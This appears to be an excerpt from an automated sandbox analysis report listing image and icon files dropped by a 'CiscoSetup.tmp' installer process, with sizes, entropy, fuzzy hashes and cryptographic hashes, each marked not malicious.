                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
